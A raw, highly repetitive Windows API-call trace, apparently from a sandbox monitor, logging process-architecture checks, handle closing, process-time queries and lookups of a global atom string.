	[0141.864] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.864] CloseHandle (hObject=0x2dc) returned 1
	[0141.864] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.864] CloseHandle (hObject=0x2dc) returned 1
	[0141.864] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.865] CloseHandle (hObject=0x2dc) returned 1
	[0141.865] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.865] CloseHandle (hObject=0x2dc) returned 1
	[0141.865] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.865] CloseHandle (hObject=0x2dc) returned 1
	[0141.865] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.865] CloseHandle (hObject=0x2dc) returned 1
	[0141.866] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.866] CloseHandle (hObject=0x2dc) returned 1
	[0141.866] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.866] CloseHandle (hObject=0x2dc) returned 1
	[0141.866] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.866] CloseHandle (hObject=0x2dc) returned 1
	[0141.866] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.866] CloseHandle (hObject=0x2dc) returned 1
	[0141.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.867] CloseHandle (hObject=0x2dc) returned 1
	[0141.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.867] CloseHandle (hObject=0x2dc) returned 1
	[0141.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.867] CloseHandle (hObject=0x2dc) returned 1
	[0141.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.867] CloseHandle (hObject=0x2dc) returned 1
	[0141.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.868] CloseHandle (hObject=0x2dc) returned 1
	[0141.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.868] CloseHandle (hObject=0x2dc) returned 1
	[0141.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.868] CloseHandle (hObject=0x2dc) returned 1
	[0141.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.868] CloseHandle (hObject=0x2dc) returned 1
	[0141.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.869] CloseHandle (hObject=0x2dc) returned 1
	[0141.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.869] CloseHandle (hObject=0x2dc) returned 1
	[0141.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.869] CloseHandle (hObject=0x2dc) returned 1
	[0141.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.870] CloseHandle (hObject=0x2dc) returned 1
	[0141.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.870] CloseHandle (hObject=0x2dc) returned 1
	[0141.870] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.870] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.870] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.871] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.871] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.871] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.871] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.871] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.871] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.872] CloseHandle (hObject=0x2dc) returned 1
	[0141.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.872] CloseHandle (hObject=0x2dc) returned 1
	[0141.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.872] CloseHandle (hObject=0x2dc) returned 1
	[0141.873] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.615] CloseHandle (hObject=0x2dc) returned 1
	[0142.616] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.616] CloseHandle (hObject=0x2dc) returned 1
	[0142.616] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.616] CloseHandle (hObject=0x2dc) returned 1
	[0142.652] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.653] CloseHandle (hObject=0x2dc) returned 1
	[0142.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.653] CloseHandle (hObject=0x2dc) returned 1
	[0142.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.653] CloseHandle (hObject=0x2dc) returned 1
	[0142.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.653] CloseHandle (hObject=0x2dc) returned 1
	[0142.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.654] CloseHandle (hObject=0x2dc) returned 1
	[0142.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.654] CloseHandle (hObject=0x2dc) returned 1
	[0142.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.654] CloseHandle (hObject=0x2dc) returned 1
	[0142.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.655] CloseHandle (hObject=0x2dc) returned 1
	[0142.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.655] CloseHandle (hObject=0x2dc) returned 1
	[0142.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.655] CloseHandle (hObject=0x2dc) returned 1
	[0142.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.655] CloseHandle (hObject=0x2dc) returned 1
	[0142.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.656] CloseHandle (hObject=0x2dc) returned 1
	[0142.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.656] CloseHandle (hObject=0x2dc) returned 1
	[0142.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.656] CloseHandle (hObject=0x2dc) returned 1
	[0142.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.656] CloseHandle (hObject=0x2dc) returned 1
	[0142.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.657] CloseHandle (hObject=0x2dc) returned 1
	[0142.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.657] CloseHandle (hObject=0x2dc) returned 1
	[0142.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.657] CloseHandle (hObject=0x2dc) returned 1
	[0142.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.657] CloseHandle (hObject=0x2dc) returned 1
	[0142.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.658] CloseHandle (hObject=0x2dc) returned 1
	[0142.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.658] CloseHandle (hObject=0x2dc) returned 1
	[0142.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.658] CloseHandle (hObject=0x2dc) returned 1
	[0142.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.659] CloseHandle (hObject=0x2dc) returned 1
	[0142.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.659] CloseHandle (hObject=0x2dc) returned 1
	[0142.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.659] CloseHandle (hObject=0x2dc) returned 1
	[0142.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.659] CloseHandle (hObject=0x2dc) returned 1
	[0142.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.660] CloseHandle (hObject=0x2dc) returned 1
	[0142.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.660] CloseHandle (hObject=0x2dc) returned 1
	[0142.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.660] CloseHandle (hObject=0x2dc) returned 1
	[0142.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.660] CloseHandle (hObject=0x2dc) returned 1
	[0142.661] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.661] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0142.661] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0142.662] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.662] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0142.662] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.663] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0142.663] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0142.663] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0142.663] CloseHandle (hObject=0x2dc) returned 1
	[0142.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0142.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.664] CloseHandle (hObject=0x2dc) returned 1
	[0142.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.664] CloseHandle (hObject=0x2dc) returned 1
	[0142.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.664] CloseHandle (hObject=0x2dc) returned 1
	[0142.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.664] CloseHandle (hObject=0x2dc) returned 1
	[0142.665] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.665] CloseHandle (hObject=0x2dc) returned 1
	[0142.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.698] CloseHandle (hObject=0x2dc) returned 1
	[0142.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.698] CloseHandle (hObject=0x2dc) returned 1
	[0142.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.698] CloseHandle (hObject=0x2dc) returned 1
	[0142.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.698] CloseHandle (hObject=0x2dc) returned 1
	[0142.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.699] CloseHandle (hObject=0x2dc) returned 1
	[0142.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.699] CloseHandle (hObject=0x2dc) returned 1
	[0142.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.699] CloseHandle (hObject=0x2dc) returned 1
	[0142.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.699] CloseHandle (hObject=0x2dc) returned 1
	[0142.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.700] CloseHandle (hObject=0x2dc) returned 1
	[0142.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.700] CloseHandle (hObject=0x2dc) returned 1
	[0142.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.700] CloseHandle (hObject=0x2dc) returned 1
	[0142.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.700] CloseHandle (hObject=0x2dc) returned 1
	[0142.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.701] CloseHandle (hObject=0x2dc) returned 1
	[0142.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.701] CloseHandle (hObject=0x2dc) returned 1
	[0142.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.701] CloseHandle (hObject=0x2dc) returned 1
	[0142.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.701] CloseHandle (hObject=0x2dc) returned 1
	[0142.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.702] CloseHandle (hObject=0x2dc) returned 1
	[0142.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.702] CloseHandle (hObject=0x2dc) returned 1
	[0142.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.702] CloseHandle (hObject=0x2dc) returned 1
	[0142.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.702] CloseHandle (hObject=0x2dc) returned 1
	[0142.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.703] CloseHandle (hObject=0x2dc) returned 1
	[0142.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.703] CloseHandle (hObject=0x2dc) returned 1
	[0142.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.703] CloseHandle (hObject=0x2dc) returned 1
	[0142.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.703] CloseHandle (hObject=0x2dc) returned 1
	[0142.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.704] CloseHandle (hObject=0x2dc) returned 1
	[0142.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.704] CloseHandle (hObject=0x2dc) returned 1
	[0142.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.704] CloseHandle (hObject=0x2dc) returned 1
	[0142.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.705] CloseHandle (hObject=0x2dc) returned 1
	[0142.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.705] CloseHandle (hObject=0x2dc) returned 1
	[0142.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.705] CloseHandle (hObject=0x2dc) returned 1
	[0142.706] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.706] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0142.706] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0142.706] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.706] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0142.707] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.707] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0142.707] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0142.707] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0142.707] CloseHandle (hObject=0x2dc) returned 1
	[0142.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0142.707] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.707] CloseHandle (hObject=0x2dc) returned 1
	[0142.708] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.708] CloseHandle (hObject=0x2dc) returned 1
	[0142.708] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.708] CloseHandle (hObject=0x2dc) returned 1
	[0142.708] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.708] CloseHandle (hObject=0x2dc) returned 1
	[0142.708] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.708] CloseHandle (hObject=0x2dc) returned 1
	[0142.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.741] CloseHandle (hObject=0x2dc) returned 1
	[0142.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.741] CloseHandle (hObject=0x2dc) returned 1
	[0142.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.741] CloseHandle (hObject=0x2dc) returned 1
	[0142.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.742] CloseHandle (hObject=0x2dc) returned 1
	[0142.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.742] CloseHandle (hObject=0x2dc) returned 1
	[0142.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.742] CloseHandle (hObject=0x2dc) returned 1
	[0142.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.742] CloseHandle (hObject=0x2dc) returned 1
	[0142.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.743] CloseHandle (hObject=0x2dc) returned 1
	[0142.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.743] CloseHandle (hObject=0x2dc) returned 1
	[0142.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.743] CloseHandle (hObject=0x2dc) returned 1
	[0142.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.744] CloseHandle (hObject=0x2dc) returned 1
	[0142.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.744] CloseHandle (hObject=0x2dc) returned 1
	[0142.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.744] CloseHandle (hObject=0x2dc) returned 1
	[0142.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.744] CloseHandle (hObject=0x2dc) returned 1
	[0142.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.745] CloseHandle (hObject=0x2dc) returned 1
	[0142.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.745] CloseHandle (hObject=0x2dc) returned 1
	[0142.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.745] CloseHandle (hObject=0x2dc) returned 1
	[0142.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.745] CloseHandle (hObject=0x2dc) returned 1
	[0142.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.746] CloseHandle (hObject=0x2dc) returned 1
	[0142.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.746] CloseHandle (hObject=0x2dc) returned 1
	[0142.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.746] CloseHandle (hObject=0x2dc) returned 1
	[0142.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.747] CloseHandle (hObject=0x2dc) returned 1
	[0142.747] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.747] CloseHandle (hObject=0x2dc) returned 1
	[0142.747] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.747] CloseHandle (hObject=0x2dc) returned 1
	[0142.747] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.747] CloseHandle (hObject=0x2dc) returned 1
	[0142.748] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.748] CloseHandle (hObject=0x2dc) returned 1
	[0142.748] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.748] CloseHandle (hObject=0x2dc) returned 1
	[0142.748] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.748] CloseHandle (hObject=0x2dc) returned 1
	[0142.748] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.748] CloseHandle (hObject=0x2dc) returned 1
	[0142.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.749] CloseHandle (hObject=0x2dc) returned 1
	[0142.749] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.749] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0142.749] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0142.750] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.750] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0142.750] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0142.750] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0142.750] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0142.750] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0142.750] CloseHandle (hObject=0x2dc) returned 1
	[0142.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0142.751] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.751] CloseHandle (hObject=0x2dc) returned 1
	[0142.751] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.751] CloseHandle (hObject=0x2dc) returned 1
	[0142.751] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.751] CloseHandle (hObject=0x2dc) returned 1
	[0142.752] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.752] CloseHandle (hObject=0x2dc) returned 1
	[0142.752] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.752] CloseHandle (hObject=0x2dc) returned 1
	[0142.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.784] CloseHandle (hObject=0x2dc) returned 1
	[0142.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0142.784] CloseHandle (hObject=0x2dc) returned 1
